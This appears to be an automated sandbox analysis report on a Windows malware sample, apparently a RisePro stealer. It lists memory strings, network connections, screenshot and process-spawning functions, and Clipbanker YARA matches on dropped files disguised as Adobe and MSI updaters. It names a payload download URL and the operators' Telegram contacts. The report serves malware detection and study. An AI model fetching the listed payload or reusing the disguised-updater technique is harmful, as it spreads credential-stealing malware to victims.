Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.3808658828.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/
Source: file.exe, 00000000.00000002.3808658828.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/_2
Source: file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe(d
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exexe
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exeUdZRC
Source: file.exe, 00000000.00000002.3808658828.0000000005DDF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exeuser
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exeid
Source: file.exe, 00000000.00000002.3807052921.0000000001201000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2659977352.0000000001295000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3808018972.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.3807052921.0000000001201000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/B
Source: file.exe, 00000000.00000003.2660139988.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.0000000001246000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.3798251494.00000000006BA000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: file.exe, 00000000.00000003.2660139988.000000000123B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.000000000123C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/k:
Source: file.exe, 00000000.00000002.3807052921.000000000121A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/154.16.105.36
Source: file.exe, 00000000.00000003.2660139988.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.0000000001246000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/154.16.105.36.
Source: file.exe, 00000000.00000003.2660139988.0000000001246000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3807052921.0000000001246000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io:443/widget/demo/154.16.105.360
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, RthubJXJJOhKyKgs0z_b.exe.0.dr, IHobmyUUXF8jFZ9HHCK7.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1432787987.0000000005DAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1428508765.0000000006228000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.3807052921.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3809268404.0000000006210000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441495454.0000000006215000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp, Firefox_24a4ohrz.default-release.txt.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
Source: file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/atata
Source: file.exe, 00000000.00000003.1425350053.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1429232034.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1433607742.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435992765.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1434474770.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1438439382.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1426483191.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3808658828.0000000005D8C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.3807052921.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442348203.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2660139988.000000000125B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441917639.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441725385.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442821910.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1443357927.0000000001263000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1441605252.0000000001262000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1442028613.0000000001263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/irefoxf
Source: file.exe, 00000000.00000002.3809268404.0000000006210000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/nS
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.8:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.8:49717 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FC230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_068FC230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068D9080 OpenDesktopA,CreateDesktopA, 0_2_068D9080

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 38.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 38.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 20.2.RthubJXJJOhKyKgs0z_b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 20.2.RthubJXJJOhKyKgs0z_b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 33.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 33.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 21.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 21.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 30.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 30.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 8.2.IHobmyUUXF8jFZ9HHCK7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.IHobmyUUXF8jFZ9HHCK7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 41.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 41.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 44.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 44.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 25.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 12.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 12.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000015.00000002.1654590911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000015.00000002.1654590911.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.1568547608.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.1568547608.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000029.00000002.1986808153.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000029.00000002.1986808153.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000026.00000002.1907034183.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000026.00000002.1907034183.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.1653499972.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.1653499972.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001E.00000002.1731319908.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001E.00000002.1731319908.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000014.00000002.1638452398.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000014.00000002.1638452398.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000002C.00000002.3795988174.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000002C.00000002.3795988174.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000C.00000002.1586960616.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000C.00000002.1586960616.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000B.00000002.1585774146.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000002.1585774146.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000019.00000002.1649208169.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000019.00000002.1649208169.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000021.00000002.1812078816.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000021.00000002.1812078816.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.1585794053.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.1585794053.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
PE file contains section with special chars
Source: file.exe Static PE information: section name: .vmp,,,0
Source: file.exe Static PE information: section name: .vmp,,,1
Source: file.exe Static PE information: section name: .vmp,,,2
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068DC480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_068DC480
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00658080 0_2_00658080
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005E2100 0_2_005E2100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0069C8D0 0_2_0069C8D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B8BA0 0_2_005B8BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A3160 0_2_006A3160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005DF730 0_2_005DF730
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A40A0 0_2_006A40A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005A035F 0_2_005A035F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00646470 0_2_00646470
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B47AD 0_2_005B47AD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0059A918 0_2_0059A918
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A4AE0 0_2_006A4AE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00644B90 0_2_00644B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00782DF7 0_2_00782DF7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B8E20 0_2_005B8E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00597190 0_2_00597190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0069F280 0_2_0069F280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0058F570 0_2_0058F570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064B500 0_2_0064B500
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006A5A40 0_2_006A5A40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0064BFC0 0_2_0064BFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068DA230 0_2_068DA230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FC990 0_2_068FC990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068FD540 0_2_068FD540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068D9A10 0_2_068D9A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068E3B60 0_2_068E3B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068F1980 0_2_068F1980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0691E63B 0_2_0691E63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068DC760 0_2_068DC760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068E24B0 0_2_068E24B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0691E2DC 0_2_0691E2DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_068F4370 0_2_068F4370
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
PE / OLE file has an invalid certificate
Source: file.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.2660060776.0000000005DE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000002.3809076679.0000000005DE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.1554817305.0000000006611000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.1619335291.00000000068B2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.1624496225.00000000068BC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.1550663261.0000000006610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.1620620670.00000000068B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 38.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 38.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 20.2.RthubJXJJOhKyKgs0z_b.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
